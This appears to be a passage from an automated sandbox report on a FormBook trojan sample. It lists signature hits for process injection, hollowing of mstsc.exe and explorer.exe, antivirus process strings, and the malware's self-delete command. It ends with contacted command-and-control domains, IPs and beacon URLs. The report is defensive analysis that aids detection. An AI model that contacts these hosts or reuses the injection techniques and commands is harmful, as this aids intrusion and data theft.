Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01374496 mov eax, dword ptr fs:[00000030h] 1_2_01374496
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01374496 mov eax, dword ptr fs:[00000030h] 1_2_01374496
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01374496 mov eax, dword ptr fs:[00000030h] 1_2_01374496
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01374496 mov eax, dword ptr fs:[00000030h] 1_2_01374496
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01374496 mov eax, dword ptr fs:[00000030h] 1_2_01374496
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C849B mov eax, dword ptr fs:[00000030h] 1_2_012C849B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01336CF0 mov eax, dword ptr fs:[00000030h] 1_2_01336CF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01336CF0 mov eax, dword ptr fs:[00000030h] 1_2_01336CF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01336CF0 mov eax, dword ptr fs:[00000030h] 1_2_01336CF0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013714FB mov eax, dword ptr fs:[00000030h] 1_2_013714FB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01388CD6 mov eax, dword ptr fs:[00000030h] 1_2_01388CD6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012B4F2E mov eax, dword ptr fs:[00000030h] 1_2_012B4F2E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DB73D mov eax, dword ptr fs:[00000030h] 1_2_012DB73D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E3F33 mov eax, dword ptr fs:[00000030h] 1_2_012E3F33
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EE730 mov eax, dword ptr fs:[00000030h] 1_2_012EE730
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EA70E mov eax, dword ptr fs:[00000030h] 1_2_012EA70E
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0134FF10 mov eax, dword ptr fs:[00000030h] 1_2_0134FF10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0138070D mov eax, dword ptr fs:[00000030h] 1_2_0138070D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DF716 mov eax, dword ptr fs:[00000030h] 1_2_012DF716
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E4710 mov eax, dword ptr fs:[00000030h] 1_2_012E4710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012CFF60 mov eax, dword ptr fs:[00000030h] 1_2_012CFF60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01388F6A mov eax, dword ptr fs:[00000030h] 1_2_01388F6A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01371751 mov eax, dword ptr fs:[00000030h] 1_2_01371751
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012CEF40 mov eax, dword ptr fs:[00000030h] 1_2_012CEF40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01337794 mov eax, dword ptr fs:[00000030h] 1_2_01337794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C8794 mov eax, dword ptr fs:[00000030h] 1_2_012C8794
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F37F5 mov eax, dword ptr fs:[00000030h] 1_2_012F37F5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0136FE3F mov eax, dword ptr fs:[00000030h] 1_2_0136FE3F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BE620 mov eax, dword ptr fs:[00000030h] 1_2_012BE620
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BC600 mov eax, dword ptr fs:[00000030h] 1_2_012BC600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov eax, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D5600 mov ecx, dword ptr fs:[00000030h] 1_2_012D5600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E8E00 mov eax, dword ptr fs:[00000030h] 1_2_012E8E00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EA61C mov eax, dword ptr fs:[00000030h] 1_2_012EA61C
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01371608 mov eax, dword ptr fs:[00000030h] 1_2_01371608
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C766D mov eax, dword ptr fs:[00000030h] 1_2_012C766D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DAE73 mov eax, dword ptr fs:[00000030h] 1_2_012DAE73
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C7E41 mov eax, dword ptr fs:[00000030h] 1_2_012C7E41
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0137AE44 mov eax, dword ptr fs:[00000030h] 1_2_0137AE44
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013346A7 mov eax, dword ptr fs:[00000030h] 1_2_013346A7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01380EA5 mov eax, dword ptr fs:[00000030h] 1_2_01380EA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0134FE87 mov eax, dword ptr fs:[00000030h] 1_2_0134FE87
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E16E0 mov ecx, dword ptr fs:[00000030h] 1_2_012E16E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C76E2 mov eax, dword ptr fs:[00000030h] 1_2_012C76E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E36CC mov eax, dword ptr fs:[00000030h] 1_2_012E36CC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F8EC7 mov eax, dword ptr fs:[00000030h] 1_2_012F8EC7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01388ED6 mov eax, dword ptr fs:[00000030h] 1_2_01388ED6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0136FEC0 mov eax, dword ptr fs:[00000030h] 1_2_0136FEC0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047AAC7B mov eax, dword ptr fs:[00000030h] 6_2_047AAC7B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479B477 mov eax, dword ptr fs:[00000030h] 6_2_0479B477
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479746D mov eax, dword ptr fs:[00000030h] 6_2_0479746D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04834496 mov eax, dword ptr fs:[00000030h] 6_2_04834496
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047AA44B mov eax, dword ptr fs:[00000030h] 6_2_047AA44B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047A3C3E mov eax, dword ptr fs:[00000030h] 6_2_047A3C3E
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04848CD6 mov eax, dword ptr fs:[00000030h] 6_2_04848CD6
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047ABC2C mov eax, dword ptr fs:[00000030h] 6_2_047ABC2C
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047F6C0A mov eax, dword ptr fs:[00000030h] 6_2_047F6C0A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_048314FB mov eax, dword ptr fs:[00000030h] 6_2_048314FB
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04831C06 mov eax, dword ptr fs:[00000030h] 6_2_04831C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0484740D mov eax, dword ptr fs:[00000030h] 6_2_0484740D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047F6CF0 mov eax, dword ptr fs:[00000030h] 6_2_047F6CF0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0480C450 mov eax, dword ptr fs:[00000030h] 6_2_0480C450
Enables debug privileges
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\mstsc.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: unknown protection: read write
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\mstsc.exe Thread register set: target process: 2896
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: AB0000
Writes to foreign memory regions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 9C6008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: explorer.exe, 00000002.00000000.687108455.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000002.00000000.687502736.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000006.00000002.1032343786.0000000003000000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1029188263.00000000013D0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.687502736.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000006.00000002.1032343786.0000000003000000.00000002.00000001.sdmp, explorer.exe, 00000010.00000003.881834324.0000000006499000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: WerFault.exe, 0000000A.00000003.731420901.000001EDC784C000.00000004.00000001.sdmp Binary or memory string: GetProgmanWindow
Source: explorer.exe, 00000002.00000000.687502736.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000006.00000002.1032343786.0000000003000000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1029188263.00000000013D0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000010.00000002.1042861311.00000000048E7000.00000004.00000001.sdmp Binary or memory string: Progmank
Source: explorer.exe, 00000002.00000000.687502736.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000006.00000002.1032343786.0000000003000000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1029188263.00000000013D0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.704041361.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
Source: WerFault.exe, 0000000A.00000003.731420901.000001EDC784C000.00000004.00000001.sdmp Binary or memory string: SetProgmanWindow
Source: explorer.exe, 00000010.00000002.1047169993.000000000637F000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndQ
Source: explorer.exe, 00000010.00000002.1026816481.0000000000DD7000.00000004.00000020.sdmp Binary or memory string: CProgman-71

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132561585936642615.txt VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState VolumeInformation
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERAntiSpyware\SUPERAntiSpyware.exe
Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Malwarebytes Anti-Malware\mbam.exe
Source: SearchUI.exe, 00000016.00000002.913336755.000001B8D1870000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\Windows Defender\MSASCui.exe
Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Avira\AntiVir Desktop\avcenter.exe
Source: SearchUI.exe, 00000016.00000003.853890231.000001B8E4627000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Avira\Antivirus\avcenter.exe

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

Behavior Graph (ID: 344595, Sample: SecuriteInfo.com.Trojan.Pac..., Startdate: 26/01/2021, Architecture: WINDOWS, Score: 100)

The graph image is not recoverable; the process tree, signatures and network contacts read from its nodes and edges are:

Sample start
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 3 other signatures
  DNS/IP: www.infomgt.net
  SecuriteInfo.com.Trojan.Packed2.42783.14936.exe (started)
    Dropped: C:\Users\user\AppData\...\AddInProcess32.exe (PE32); SecuriteInfo.com.T...42783.14936.exe.log (ASCII)
    Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Hides that the sample has been downloaded from the Internet (zone.identifier); Injects a PE file into a foreign processes
    AddInProcess32.exe (started)
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
      explorer.exe (injected)
        mstsc.exe (started)
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          explorer.exe (started)
            DNS/IP: g2vies.com 34.102.136.180 (ports 49775, 49777, 80; GOOGLEUS, United States); www.thesunchronical.com; 5 other IPs or domains
            Signatures: System process connects to network (likely due to code injection or exploit)
          cmd.exe (started)
            conhost.exe (started)
        WerFault.exe (started)
  SearchUI.exe (started)
  SearchUI.exe (started)

Contacted Public IPs

IP Domain Country ASN ASN Name Malicious
34.102.136.180 unknown United States 15169 GOOGLEUS true

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
edu4go.com 34.102.136.180 true
www.infomgt.net 188.166.214.231 true
g2vies.com 34.102.136.180 true
www.g2vies.com unknown unknown
www.edu4go.com unknown unknown
www.serenityhomedits.com unknown unknown
www.thesunchronical.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.edu4go.com/bsl/?mt=meRO04KZ+tRueejEQ1mKApUC+xiZQAGZPTeO6WstMPZoEBgumINoRWRpGBFK3WkMjtLu&2d=hxlpdRkxCvtTgBzP true Avira URL Cloud: safe unknown
http://www.g2vies.com/bsl/?2d=hxlpdRkxCvtTgBzP&mt=B72SzM4OK6YheLE+tS6SAH+1fBRAvDBThfWED1RPUqC7thw4cowf+3ukjA/mpLG53kNi true Avira URL Cloud: safe unknown